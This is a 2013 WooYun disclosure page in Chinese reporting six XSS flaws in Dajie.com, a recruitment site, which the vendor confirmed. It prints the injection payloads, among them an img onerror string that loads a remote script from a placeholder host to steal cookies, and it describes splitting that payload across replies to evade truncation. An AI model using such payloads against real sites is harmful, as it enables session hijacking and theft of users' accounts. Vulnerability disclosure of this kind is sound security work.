当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039560

漏洞标题:大街网存储及反射xss漏洞大礼包

相关厂商:大杰世纪科技发展(北京)有限公司

漏洞作者: shellcat

提交时间:2013-10-21 14:12

修复时间:2013-12-05 14:13

公开时间:2013-12-05 14:13

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-21: 细节已通知厂商并且等待厂商处理中
2013-10-21: 厂商已经确认,细节仅向厂商公开
2013-10-31: 细节向核心白帽子及相关领域专家公开
2013-11-10: 细节向普通白帽子公开
2013-11-20: 细节向实习白帽子公开
2013-12-05: 细节向公众公开

简要描述:

3个存储型xss+3个反射型xss

详细说明:

一个月前看到某人提交了大街网sql注入,于是随便逛了下,发现不少xss,今天闲下来了就顺手提交了。。
1.个人动态中显示回答别人问题的回复内容没有过滤
当我们在问题首页中随便找一个问题回复时,对敏感字符进行测试,如下图所示:

1.jpg


我们回到个人首页看到个人动态界面如下图所示:

2.jpg


在这里没有对'"<>等敏感字符过滤,于是我们可以构造一下,因为我发现在回答别人问题的回复内容中如果有闭合的script标签就会被移除掉,只有利用其它标签构造出如下内容

"><img src="#" onerror="document.body.appendChild(createElement('script')).src='http://xxx'"


结果发现在自己搭建的xss平台那边并没有收到cookie,我们来看一下个人动态中回复对应的源码

3.jpg


原来字符超过了一定的字数会用省略号代替,于是使用拼接的方法,回复问题几条内容后,全部在个人动态中显示,几条回复组合成功打洞,并在xss平台成功收到cookie,如下图所示:

4.jpg


2.在校园招聘->求职意愿页面中的“屏蔽这些职位”这个文本框没有进行过滤,如下图所示

1.jpg


在该文本框中输入"><img src="#" onerror="alert(1)",效果如下图所示:

2.jpg


3.好友人脉中“他的联系人”中有很多朋友的名片,名片中有近期共享,这里存在xss,通过查看近期共享我们能发现一些端倪
经测试,我们自己分享一个内容如下:

"><img onmouseover="alert(1)"


到好友人脉中->他的联系人这个页面我们能看到如下效果:

.jpg


4.在校园招聘->应届生项目中的搜索存在反射型xss,不过有点奇怪的是需要通过移动输入焦点来触发xss,看图:

.jpg


1.jpg


5.在个人首页右上角的搜索存在反射型xss,也是需要通过移动输入焦点来触发xss,效果与第四个xss一样
6.在问答搜索里面也存在反射型xss,不过与前两个反射型xss不同的是,这个xss通过输入以下内容

"><img src="#" onerror="alert(1)"


然后点击搜索按钮便触发xss,尼玛现在无法进入问答搜索页面估计在维护,后续补上图片

漏洞证明:

证明在上面的图片中已经给出了。。。

修复方案:

敏感字符该过滤的应该过滤,做好过滤吧,xss实在太多了。。都不忍心找下去了

版权声明:转载请注明来源 shellcat@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-10-21 14:24

厂商回复:

非常感谢,我们会尽快修补漏洞

最新状态:

暂无